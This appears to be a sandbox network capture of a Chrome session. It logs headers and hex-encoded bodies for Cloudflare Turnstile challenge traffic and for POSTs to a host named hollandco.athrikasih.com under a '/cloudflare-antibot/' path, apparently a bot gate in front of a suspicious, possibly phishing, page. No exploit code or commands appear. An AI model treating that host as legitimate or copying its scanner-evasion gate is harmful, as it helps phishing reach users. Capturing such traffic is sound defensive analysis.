                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:28 UTC349INHTTP/1.1 404 Not Found
                                                                                                        Date: Fri, 04 Oct 2024 13:11:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        cf-chl-out: jURCPbR+ymPyoPSYu8/3U0yUEK6KuFtBcw8=$1woyMl80jmkMWjn8
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b034e4bde94-EWR
                                                                                                        2024-10-04 13:11:28 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.1649741104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:31 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 33812
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        CF-Challenge: c6eaeb7329255dd
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Origin: https://challenges.cloudflare.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:31 UTC16384OUTData Raw: 76 5f 38 63 64 35 36 61 64 66 31 65 34 63 37 63 65 37 3d 35 31 4e 55 2d 61 64 25 32 62 59 39 59 42 4b 6b 6e 6a 7a 6a 38 39 4e 42 66 6a 48 6a 58 55 4b 24 61 6c 64 6f 6a 61 24 64 67 64 45 6a 4b 37 6b 44 61 64 63 6a 42 24 42 67 6a 62 67 6a 50 44 37 50 6e 64 46 6a 43 37 4e 6a 6f 32 6a 67 6d 6a 63 55 50 32 38 6f 6a 61 72 36 6a 77 55 36 71 59 70 6a 67 37 64 66 6a 4e 24 42 36 39 54 50 6a 61 6c 4b 71 55 77 6c 4f 38 74 36 58 41 67 66 64 6a 76 43 35 76 5a 24 75 77 6a 6a 50 39 6a 50 57 24 2b 2b 24 42 6c 39 6a 64 2b 77 50 46 4f 33 73 56 67 6c 64 6b 6c 75 67 71 61 4e 30 76 76 51 7a 37 59 77 4e 76 4c 48 71 6a 64 53 38 42 41 50 50 24 6a 6b 6a 67 58 39 2b 6e 4b 43 6a 42 35 39 54 46 67 58 72 36 45 2b 66 6a 64 35 4e 4f 71 51 70 30 30 43 66 6c 54 30 71 6b 67 6a 55 59 43 49
                                                                                                        Data Ascii: v_8cd56adf1e4c7ce7=51NU-ad%2bY9YBKknjzj89NBfjHjXUK$aldoja$dgdEjK7kDadcjB$BgjbgjPD7PndFjC7Njo2jgmjcUP28ojar6jwU6qYpjg7dfjN$B69TPjalKqUwlO8t6XAgfdjvC5vZ$uwjjP9jPW$++$Bl9jd+wPFO3sVgldklugqaN0vvQz7YwNvLHqjdS8BAPP$jkjgX9+nKCjB59TFgXr6E+fjd5NOqQp00CflT0qkgjUYCI
                                                                                                        2024-10-04 13:11:31 UTC16384OUTData Raw: 77 65 46 50 45 6a 68 7a 67 76 77 6a 61 52 51 6f 55 2d 6a 58 38 69 59 77 7a 68 54 4e 31 55 58 33 4d 52 49 5a 59 50 31 6a 52 6f 36 6a 39 55 42 59 6a 50 6a 64 66 61 5a 6a 70 6a 39 4b 61 58 6a 41 31 76 24 64 6e 6a 65 6a 64 4e 64 67 6a 45 24 69 73 6a 4b 6a 73 6a 4e 4e 42 4a 6a 4e 6a 64 4e 6a 74 24 50 6a 69 4e 64 39 6a 49 55 61 6a 42 30 6a 47 55 6b 59 64 24 6a 54 67 50 4b 6a 4a 6a 5a 55 77 6a 61 47 6a 4c 46 6a 24 64 72 6a 65 57 50 49 6a 6a 64 4f 24 77 37 61 36 6a 72 4a 72 4e 6a 6e 6a 33 33 52 4f 72 36 6a 4f 67 4f 53 4b 57 6a 2d 6a 35 4b 6a 6c 64 52 6a 78 6a 42 53 6a 4a 55 58 37 64 6e 6a 65 2b 67 76 42 61 64 69 6a 48 63 61 53 6a 54 44 38 71 61 34 37 48 59 69 24 6a 67 6a 58 6a 50 49 61 39 64 4e 55 68 55 61 6d 6a 5a 31 58 63 6a 6f 6a 4e 6a 67 55 6a 4b 6a 78 6a 69
                                                                                                        Data Ascii: weFPEjhzgvwjaRQoU-jX8iYwzhTN1UX3MRIZYP1jRo6j9UBYjPjdfaZjpj9KaXjA1v$dnjejdNdgjE$isjKjsjNNBJjNjdNjt$PjiNd9jIUajB0jGUkYd$jTgPKjJjZUwjaGjLFj$drjeWPIjjdO$w7a6jrJrNjnj33ROr6jOgOSKWj-j5KjldRjxjBSjJUX7dnje+gvBadijHcaSjTD8qa47HYi$jgjXjPIa9dNUhUamjZ1XcjojNjgUjKjxji
                                                                                                        2024-10-04 13:11:31 UTC1044OUTData Raw: 6f 38 32 24 44 38 4a 77 53 62 76 6a 35 67 6f 6f 64 46 6a 4e 37 77 45 37 6c 36 4a 41 6f 38 53 33 66 51 68 52 44 62 75 4b 4b 6e 64 32 64 76 67 38 4a 67 64 63 74 33 34 74 7a 48 6a 47 73 4f 41 6b 4b 34 32 67 4e 33 24 50 56 37 58 58 4a 44 2d 62 69 66 4d 2b 61 50 6a 74 6a 46 43 43 56 76 4c 4e 6e 24 42 49 56 71 4f 4d 53 52 66 53 6f 6e 6c 38 62 52 74 44 6a 39 4c 53 6d 53 4a 4f 75 4f 62 56 41 70 55 58 68 36 41 41 6e 75 62 4e 55 75 64 44 55 69 24 42 49 6a 76 6c 67 6e 50 77 58 2d 6c 35 32 6a 52 4c 48 31 73 48 53 4e 6e 44 55 38 6d 6e 57 55 76 4e 38 56 38 78 6a 54 67 6b 6f 6a 71 48 54 6a 67 38 73 44 6a 36 52 24 49 7a 51 75 68 61 70 56 2b 4e 6b 32 4e 67 76 56 52 6a 32 73 2b 55 64 6e 37 47 24 4e 46 6a 6e 6a 2d 78 34 33 6b 6e 72 50 55 64 45 58 43 6a 32 78 4a 56 7a 4e 51
                                                                                                        Data Ascii: o82$D8JwSbvj5goodFjN7wE7l6JAo8S3fQhRDbuKKnd2dvg8Jgdct34tzHjGsOAkK42gN3$PV7XXJD-bifM+aPjtjFCCVvLNn$BIVqOMSRfSonl8bRtDj9LSmSJOuObVApUXh6AAnubNUudDUi$BIjvlgnPwX-l52jRLH1sHSNnDU8mnWUvN8V8xjTgkojqHTjg8sDj6R$IzQuhapV+Nk2NgvVRj2s+Udn7G$NFjnj-x43knrPUdEXCj2xJVzNQ
                                                                                                        2024-10-04 13:11:31 UTC1291INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 04 Oct 2024 13:11:31 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 6112
                                                                                                        Connection: close
                                                                                                        cf-chl-out-s: iYGuAGfe291smbBvHiC1FUWo192yq+LsI1hVAP5IOH3Q6BOz3yXcsZEaGqUBndR8I4DtUAQB6OR/0NDyz7jgScNpyRkmMvjH1Qgse6FVprrrUqR8Kp+UciGTMQpIgSxKezkhZCdzAv0LOOR7lglJXvRQChj+jmFN/RY5PoIuuicmvcUNx/pMDdQQ3Z4gff/7mNOZOa/5XqDEOYCzEv2pxLr59bQpBNXriXuSUzlTN6pTCaZlLo2DA8tva/BRrBt3fIuECOLu1PpkjXjP6RJwaGIfymWzvhEU61AKI+2nmga9HAgaRihETQy+ndSOXmxXn0Hsh0SiBgKIgLOwnvCZDjkZzhlZEDGOUPSVmi8jYt9u5VDXAGvFFRzKSaJrXzLT1ykhwz8ozHvmJaUWiZ5ofHi/VuFiFDrVDKzjlxOQ/0RbRjzBVcNjxAUJwawUpWaG8GKFT1bXTIiBVVWuiIn38QIbh7smbcZXYvTsQljjTvCakSv2WMZmh24b3GFShdkfddLCpiLDJ4jwhqUFPipZQ4GmDAj2R1CeN6psdelBuaIZzmzQvuokVbWADMUycMFCRYAyRJqU12rXYVkYuRndgo4wTDhQCqazKsfIByFgN1qU+rC+LH1d8esZ8Sd8imwIFD/EdKuw1o51WBlGLF0ek+3qv3Ng3CM/zWKabAc+FPl8rTy82CK39vTBCxPHmQkjH8aohWsvJpJ3Y/dNySPuzEdQmoXGhvyZr+XX27rcUal2H3xOjSrO+tcUwn08nr3BlFjpMKQTxZIDCnKCURhqId+gvchbIMK8eE9AhRFAd6UDUEMLQY/qvjsNkilKmnXUtTLvJ13+xYeybEr6e6WHZZrCU6iUfXSiIvUhLrf1KxS7sqHOhEPwGuC4aUqwxjKtarzZXp5FClwxuDxxhGbBn1M=$eWMO6RtGg6OKO9BD
                                                                                                        cf-chl-out: DYTX3lgwCRmmfUz6su7fNb0z57KYXskmfPJ9NNSyf6HYMrl4RAA6eOkElg7k9qhf3klOKuhPRMU+uTFzPKPTV0yYQLDIN/v/0lZbzBRIkeeuRMqgpNSatw==$gMjHS5MkgsFl0Plq
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b172f198c90-EWR
                                                                                                        2024-10-04 13:11:31 UTC78INData Raw: 67 31 39 61 69 56 31 7a 61 56 57 44 5a 6d 6c 58 69 46 74 34 58 49 65 4a 6c 32 70 32 6c 58 68 65 66 56 36 45 67 36 65 6e 6f 34 56 73 6d 59 75 6c 72 4b 47 4f 6b 6f 79 72 63 6f 61 6b 68 70 52 33 71 49 71 59 66 5a 6d 69 6a 59 32 65 6f 36
                                                                                                        Data Ascii: g19aiV1zaVWDZmlXiFt4XIeJl2p2lXhefV6Eg6eno4VsmYulrKGOkoyrcoakhpR3qIqYfZmijY2eo6
                                                                                                        2024-10-04 13:11:31 UTC1369INData Raw: 53 6a 78 36 48 44 6d 4d 79 4e 69 64 48 4d 6b 61 4f 66 6b 4d 43 71 74 72 4b 70 6c 72 43 33 75 36 69 67 74 39 53 6a 76 2b 4c 6a 33 37 37 6f 35 4f 58 56 37 73 53 76 77 65 58 4f 79 66 44 32 36 64 48 42 30 2b 33 51 74 4e 50 75 30 72 6d 2f 39 64 50 55 41 66 48 62 2b 51 6a 30 41 51 30 4c 7a 74 2f 62 42 75 34 41 45 52 62 7a 35 65 48 7a 35 2f 6b 4b 38 78 4c 35 37 66 59 56 45 39 37 35 35 67 49 4b 43 41 6e 38 4c 68 63 71 36 42 38 54 45 50 30 68 45 69 34 6a 4a 41 51 50 4f 67 62 35 4f 52 49 32 47 7a 59 41 48 69 56 43 4a 6b 6b 32 48 6a 70 50 44 6a 35 52 4d 44 4a 53 51 31 55 72 51 55 34 6c 54 79 51 6c 4a 6c 67 61 4f 45 39 69 4d 56 52 44 51 31 6b 36 59 6d 78 4a 4c 56 31 48 50 53 6c 49 59 6e 49 73 4d 6e 52 6b 61 30 78 47 63 56 4e 47 58 6b 68 4b 66 47 4e 42 57 56 2b 48 55
                                                                                                        Data Ascii: Sjx6HDmMyNidHMkaOfkMCqtrKplrC3u6igt9Sjv+Lj377o5OXV7sSvweXOyfD26dHB0+3QtNPu0rm/9dPUAfHb+Qj0AQ0Lzt/bBu4AERbz5eHz5/kK8xL57fYVE9755gIKCAn8Lhcq6B8TEP0hEi4jJAQPOgb5ORI2GzYAHiVCJkk2HjpPDj5RMDJSQ1UrQU4lTyQlJlgaOE9iMVRDQ1k6YmxJLV1HPSlIYnIsMnRka0xGcVNGXkhKfGNBWV+HU
                                                                                                        2024-10-04 13:11:31 UTC1369INData Raw: 2b 73 4a 71 65 30 5a 79 79 70 4d 54 56 71 61 4c 61 74 4b 79 77 33 70 62 68 73 62 72 4f 74 37 61 78 76 4e 32 36 74 63 43 38 76 73 6a 44 71 76 44 79 79 4d 4b 2f 7a 74 66 49 75 75 6e 6d 32 72 44 39 79 4f 7a 42 75 65 44 50 31 41 58 79 38 51 6a 37 33 41 58 4f 32 66 44 74 34 52 48 4b 35 65 41 53 2b 4f 45 5a 39 66 7a 35 35 39 34 57 33 4f 6f 65 2b 4f 33 34 4a 39 37 30 2b 66 51 6e 44 50 59 4b 44 51 54 37 44 53 6f 44 42 6a 63 76 4d 77 6b 55 47 41 6f 51 47 66 63 37 44 53 34 7a 4e 55 63 68 48 53 67 42 46 68 30 72 49 51 59 70 4a 53 42 4e 45 77 78 56 51 6a 55 6e 4c 43 5a 57 4b 79 77 70 58 6a 45 74 59 6c 38 34 4e 54 41 31 53 7a 73 30 52 54 6f 33 53 56 6f 6f 51 47 4a 55 4d 79 6c 51 62 6b 5a 4d 65 7a 78 49 53 57 39 56 55 31 4a 2b 58 45 52 50 67 6e 39 64 57 32 5a 59 59 46
                                                                                                        Data Ascii: +sJqe0ZyypMTVqaLatKyw3pbhsbrOt7axvN26tcC8vsjDqvDyyMK/ztfIuunm2rD9yOzBueDP1AXy8Qj73AXO2fDt4RHK5eAS+OEZ9fz5594W3Ooe+O34J970+fQnDPYKDQT7DSoDBjcvMwkUGAoQGfc7DS4zNUchHSgBFh0rIQYpJSBNEwxVQjUnLCZWKywpXjEtYl84NTA1Szs0RTo3SVooQGJUMylQbkZMezxISW9VU1J+XERPgn9dW2ZYYF
                                                                                                        2024-10-04 13:11:31 UTC1369INData Raw: 6f 4e 54 4f 73 36 50 59 79 72 32 6f 71 62 69 72 71 37 61 66 31 72 58 52 33 74 65 36 77 75 47 66 36 39 33 64 70 38 4f 39 36 75 6a 41 76 39 54 54 77 73 58 78 7a 37 37 73 2f 64 50 50 38 66 62 74 76 41 66 6f 2b 64 4c 35 33 38 62 65 2f 75 66 6a 79 4f 6f 4f 31 4f 67 43 37 2b 62 6e 35 51 72 59 48 52 38 50 41 53 45 55 42 51 37 7a 4a 66 76 67 36 67 41 57 2b 77 44 33 4b 78 49 45 2f 53 38 6d 41 50 59 59 42 50 6f 70 47 51 77 4a 50 7a 4d 64 46 52 38 51 42 6b 63 63 4b 42 73 56 41 69 30 66 48 45 30 73 44 79 4a 55 4c 46 59 4a 57 44 41 53 44 56 6c 62 55 78 39 66 46 79 73 31 50 57 49 66 4e 31 55 35 61 47 74 5a 53 79 41 6c 62 30 46 70 63 32 46 4d 4c 30 41 33 62 32 64 4b 55 33 35 51 66 32 39 71 55 31 4e 78 66 33 39 58 69 48 70 57 57 32 4f 47 54 55 47 51 58 45 6c 68 6b 35 4f
                                                                                                        Data Ascii: oNTOs6PYyr2oqbirq7af1rXR3te6wuGf693dp8O96ujAv9TTwsXxz77s/dPP8fbtvAfo+dL538be/ufjyOoO1OgC7+bn5QrYHR8PASEUBQ7zJfvg6gAW+wD3KxIE/S8mAPYYBPopGQwJPzMdFR8QBkccKBsVAi0fHE0sDyJULFYJWDASDVlbUx9fFys1PWIfN1U5aGtZSyAlb0Fpc2FML0A3b2dKU35Qf29qU1Nxf39XiHpWW2OGTUGQXElhk5O
                                                                                                        2024-10-04 13:11:31 UTC1369INData Raw: 71 75 64 6e 74 6d 78 6f 64 33 5a 6e 4b 62 52 77 2b 71 71 76 2b 47 6e 37 65 6e 50 71 62 4c 64 36 63 62 31 79 39 4f 7a 2b 66 6a 62 78 2f 7a 70 30 37 73 42 37 64 66 56 78 74 76 6e 32 41 72 4b 41 73 58 4f 7a 74 2f 66 30 51 34 4f 7a 64 62 57 41 75 4c 61 37 2f 76 55 48 68 72 76 38 43 45 4f 39 79 63 6d 45 76 66 37 4b 79 59 69 4c 75 37 75 41 50 73 70 36 53 55 6e 38 51 34 4b 46 52 55 34 39 44 4d 58 4d 7a 77 76 48 79 46 47 2f 53 45 42 41 51 4e 4c 51 68 6f 45 4c 41 63 6a 49 43 6f 76 44 54 55 2f 4f 43 55 51 4d 54 6b 57 4c 30 41 37 58 43 6f 34 56 53 55 34 54 32 6b 70 50 56 73 36 4f 6d 5a 45 54 46 78 64 53 44 38 78 59 57 64 70 62 79 78 62 4d 32 68 33 56 58 4f 41 59 57 4a 32 5a 6e 46 6a 66 6d 4a 34 63 30 64 69 68 6e 35 4a 68 48 74 77 63 31 46 31 64 58 69 51 5a 48 4a 73
                                                                                                        Data Ascii: qudntmxod3ZnKbRw+qqv+Gn7enPqbLd6cb1y9Oz+fjbx/zp07sB7dfVxtvn2ArKAsXOzt/f0Q4OzdbWAuLa7/vUHhrv8CEO9ycmEvf7KyYiLu7uAPsp6SUn8Q4KFRU49DMXMzwvHyFG/SEBAQNLQhoELAcjICovDTU/OCUQMTkWL0A7XCo4VSU4T2kpPVs6OmZETFxdSD8xYWdpbyxbM2h3VXOAYWJ2ZnFjfmJ4c0dihn5JhHtwc1F1dXiQZHJs
                                                                                                        2024-10-04 13:11:31 UTC558INData Raw: 37 65 6e 4c 37 62 35 4c 6e 45 33 4d 58 4b 31 73 2f 4b 77 39 47 2f 36 39 33 4f 30 38 33 6c 7a 75 2f 55 74 64 62 62 34 66 54 61 30 39 48 6a 37 75 50 70 31 64 2f 6f 36 74 33 6c 78 74 33 74 2b 74 2f 78 43 76 44 6c 42 4f 58 79 30 76 6e 70 39 78 51 55 47 51 4d 61 39 66 63 58 39 51 66 36 41 78 30 4f 44 51 67 4e 41 75 4d 52 45 67 6f 41 4a 79 77 73 4d 68 55 4a 2b 44 55 59 48 41 6f 36 49 41 2f 32 47 43 55 54 49 68 30 73 41 79 49 35 4c 43 31 49 47 30 41 4c 53 31 59 7a 53 52 59 6f 50 44 78 50 48 54 5a 41 53 53 31 53 51 6d 42 66 50 6b 52 63 4e 55 42 69 5a 54 31 4e 59 30 49 6f 53 47 70 6c 52 55 78 59 61 33 70 71 63 6d 6c 4c 56 48 46 68 4f 6e 4e 6b 64 56 56 63 65 57 6d 4b 65 33 31 33 6a 6e 35 67 67 57 4f 43 64 49 65 57 68 59 35 6e 61 58 42 73 69 57 32 50 67 4a 4f 69 65
                                                                                                        Data Ascii: 7enL7b5LnE3MXK1s/Kw9G/693O083lzu/Utdbb4fTa09Hj7uPp1d/o6t3lxt3t+t/xCvDlBOXy0vnp9xQUGQMa9fcX9Qf6Ax0ODQgNAuMREgoAJywsMhUJ+DUYHAo6IA/2GCUTIh0sAyI5LC1IG0ALS1YzSRYoPDxPHTZASS1SQmBfPkRcNUBiZT1NY0IoSGplRUxYa3pqcmlLVHFhOnNkdVVceWmKe313jn5ggWOCdIeWhY5naXBsiW2PgJOie


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.1649742104.18.94.414431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:32 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255dd HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:32 UTC349INHTTP/1.1 404 Not Found
                                                                                                        Date: Fri, 04 Oct 2024 13:11:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 7
                                                                                                        Connection: close
                                                                                                        cf-chl-out: a9xRtxgr7qIIfvm6p9GhGttZm9rqS8/yD60=$Pgxs/FZaBIPseeJA
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8cd56b1c0eea7cb2-EWR
                                                                                                        2024-10-04 13:11:32 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                        Data Ascii: invalid


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.1649743103.159.65.1464431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:32 UTC694OUTPOST /cdn-cgi/challenge-platform/h/g/rc/8cd56adf1e4c7ce7 HTTP/1.1
                                                                                                        Host: hollandco.athrikasih.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 916
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Content-Type: application/json
                                                                                                        Accept: */*
                                                                                                        Origin: https://hollandco.athrikasih.com
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: cors
                                                                                                        Sec-Fetch-Dest: empty
                                                                                                        Referer: https://hollandco.athrikasih.com/cloudflare-antibot/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:32 UTC916OUTData Raw: 7b 22 73 69 74 65 6b 65 79 22 3a 22 30 78 34 41 41 41 41 41 41 41 68 6b 66 4b 31 6e 7a 38 6a 6a 47 2d 77 45 22 2c 22 73 65 63 6f 6e 64 61 72 79 54 6f 6b 65 6e 22 3a 22 30 2e 46 71 35 6c 6c 46 58 30 6e 68 4c 38 54 6a 6f 65 6e 79 5a 6e 7a 37 50 59 64 76 4c 63 6d 4c 39 69 6d 52 76 5a 69 4b 46 4d 75 4c 41 33 4f 5a 32 59 36 58 4a 44 2d 46 48 39 71 6b 33 6f 52 38 2d 73 72 63 6c 54 5f 47 63 35 30 35 75 4c 78 48 6e 58 39 56 63 53 42 33 32 30 54 48 63 45 45 61 35 4b 52 32 61 61 42 58 68 68 59 69 6f 65 43 6d 36 76 77 44 68 50 37 34 52 64 64 4f 49 36 59 46 77 75 4e 69 48 62 50 37 67 6c 37 44 6d 65 50 39 56 67 77 50 42 37 61 50 32 4d 77 53 6b 6c 79 33 4b 39 68 47 4f 5a 68 4f 65 75 62 35 41 73 55 6b 37 4f 6c 61 38 55 63 2d 32 54 6b 6a 6f 69 53 67 61 73 51 5f 49 63 52
                                                                                                        Data Ascii: {"sitekey":"0x4AAAAAAAhkfK1nz8jjG-wE","secondaryToken":"0.Fq5llFX0nhL8TjoenyZnz7PYdvLcmL9imRvZiKFMuLA3OZ2Y6XJD-FH9qk3oR8-srclT_Gc505uLxHnX9VcSB320THcEEa5KR2aaBXhhYioeCm6vwDhP74RddOI6YFwuNiHbP7gl7DmeP9VgwPB7aP2MwSkly3K9hGOZhOeub5AsUk7Ola8Uc-2TkjoiSgasQ_IcR
                                                                                                        2024-10-04 13:11:33 UTC415INHTTP/1.1 404 Not Found
                                                                                                        Connection: close
                                                                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                        pragma: no-cache
                                                                                                        content-type: text/html
                                                                                                        content-length: 796
                                                                                                        date: Fri, 04 Oct 2024 13:11:33 GMT
                                                                                                        server: LiteSpeed
                                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                        2024-10-04 13:11:33 UTC796INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.1649745103.159.65.1464431904C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-04 13:11:34 UTC895OUTPOST /cloudflare-antibot/ HTTP/1.1
                                                                                                        Host: hollandco.athrikasih.com
                                                                                                        Connection: keep-alive
                                                                                                        Content-Length: 880
                                                                                                        Cache-Control: max-age=0
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        Origin: https://hollandco.athrikasih.com
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-User: ?1
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Referer: https://hollandco.athrikasih.com/cloudflare-antibot/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-10-04 13:11:34 UTC880OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 66 63 65 39 67 39 5f 39 6e 70 6f 5f 4b 55 38 61 56 31 41 6f 56 33 79 69 41 75 67 47 77 53 71 73 2d 52 4c 39 4f 4f 68 6d 2d 76 6e 53 59 54 77 74 41 6f 58 39 64 6a 39 45 78 49 6e 45 51 71 71 65 51 42 39 6b 69 6b 58 32 34 43 56 67 32 47 46 31 55 49 45 61 63 63 35 35 53 7a 47 53 5a 51 76 34 31 64 64 75 7a 48 42 58 5f 6c 37 34 38 7a 65 78 45 63 69 4e 52 61 6a 52 64 69 6b 56 66 4e 30 58 4a 65 50 61 5f 38 64 2d 6e 41 58 38 62 65 76 39 4e 4b 6b 39 39 45 38 50 6a 5a 52 57 33 4f 69 6b 6a 4f 63 4a 4b 51 6b 78 57 4e 4c 54 5f 30 31 41 78 2d 34 56 45 75 43 76 31 6e 66 65 71 70 79 54 32 66 70 56 2d 52 6b 4f 6b 74 6f 49 37 69 5f 4d 79 32 52 65 31 55 2d 76 35 50 7a 51 76 59 44 44 44 6f 6f 31 6d 58 64
                                                                                                        Data Ascii: cf-turnstile-response=0.fce9g9_9npo_KU8aV1AoV3yiAugGwSqs-RL9OOhm-vnSYTwtAoX9dj9ExInEQqqeQB9kikX24CVg2GF1UIEacc55SzGSZQv41dduzHBX_l748zexEciNRajRdikVfN0XJePa_8d-nAX8bev9NKk99E8PjZRW3OikjOcJKQkxWNLT_01Ax-4VEuCv1nfeqpyT2fpV-RkOktoI7i_My2Re1U-v5PzQvYDDDoo1mXd
                                                                                                        2024-10-04 13:11:35 UTC359INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        x-powered-by: PHP/7.4.33
